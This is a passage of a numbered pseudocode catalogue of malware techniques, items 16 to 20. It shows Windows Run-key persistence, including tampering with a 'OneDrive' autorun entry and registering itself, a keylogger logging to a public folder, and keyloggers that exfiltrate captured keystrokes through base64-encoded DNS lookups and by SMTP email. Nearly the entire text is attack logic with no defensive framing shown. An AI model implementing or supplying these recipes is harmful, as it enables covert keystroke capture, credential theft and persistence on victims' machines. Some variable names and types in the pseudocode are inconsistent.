CALL winapi get_module_filename(NULL, path, MAX_PATH)


CALL winapi open_regkey(HKEY_CURRENT_USER, autorun_path, 0, KEY_SET_VALUE, &hkey)
CALL winapi delete_regkey_val(hkey, "OneDrive")
CALL winapi close_regkey(hkey)

16. Modify registry key


FUNCTION main
INITIALIZE hkey
SET autorun_path = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
SET rogue_value = 0

CALL winapi get_module_filename(NULL, path, MAX_PATH)


CALL winapi open_regkey(HKEY_CURRENT_USER, autorun_path, 0, KEY_SET_VALUE, &hkey)
CALL winapi set_regkey_val(hkey, "OneDrive", 0, REG_DWORD, rogue_value, length of path + 1)
CALL winapi close_regkey(hkey)

17. Add registry key


FUNCTION main
SET path = call get_module_file_name()
INITIALIZE hkey
SET autorun_path = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"

CALL winapi get_module_filename(NULL, path, MAX_PATH)


CALL winapi open_regkey(HKEY_CURRENT_USER, autorun_path, 0, KEY_SET_VALUE, &hkey)
CALL winapi set_regkey_val(hkey, "ProgramName", 0, REG_SZ, path, length of path + 1)
CALL winapi close_regkey(hkey)

18. Simple keylogger
FUNCTION flush_buffer(buffer, path)
SET file := open(path)
CALL write (file, buffer)
CALL clear(buffer)

FUNCTION main
SET path := “C:\\Users\\Public\\key.log”
SET buffer
SET buffer_length

while not terminated do


poll key events
if length of buffer == buffer_length
CALL flush_buffer(buffer, path)

if buffer is not empty


CALL flush_buffer(buffer, path)

19. Keylogger that sends file with data via DNS


FUNCTION flush_buffer(buffer, path)
SET file := open(path)
CALL write(file, buffer)
CALL clear(buffer)

FUNCTION dns_query(host, chunk_size, path)


SET contents := read(path)
SET chunks := split contents

for chunk in chunks do


SET encoded := base64_encode(chunk)
SET out := CALL system(nslookup "{encoded}.{hostname}")

FUNCTION main
SET host
SET chunk_size
SET path = “C:\\Users\\Public\\keydns.log”
SET buffer
SET buffer_length

while not terminated do


poll key events
if length of buffer == buffer_length

CALL flush_buffer(buffer, path)

if buffer is not empty


CALL flush_buffer(buffer, path)

CALL dns_query(host, chunk_size, path)

20. Keylogger that sends file with data via Email


FUNCTION flush_buffer(buffer, path)
SET file := open(path)
CALL write(file, buffer)
CALL clear(buffer)

FUNCTION send_email(from, to, subject, attachment, smtp_server, username, password)
SET contents := read(attachment)
SET email := construct email
INITIALIZE smtp_transport
send smtp commands

FUNCTION main
SET sender
SET receiver
SET subject
SET attachment
SET smtp_server
SET username
SET password
SET buffer
SET buffer_length
SET path = “C:\\Users\\Public\\keyem.log”

while not terminated do


poll key events
if length of buffer == buffer_length
CALL flush_buffer(buffer, path)

if buffer is not empty


CALL flush_buffer(buffer, path)

CALL send_email(sender, receiver, subject, attachment, smtp_server, username, password)
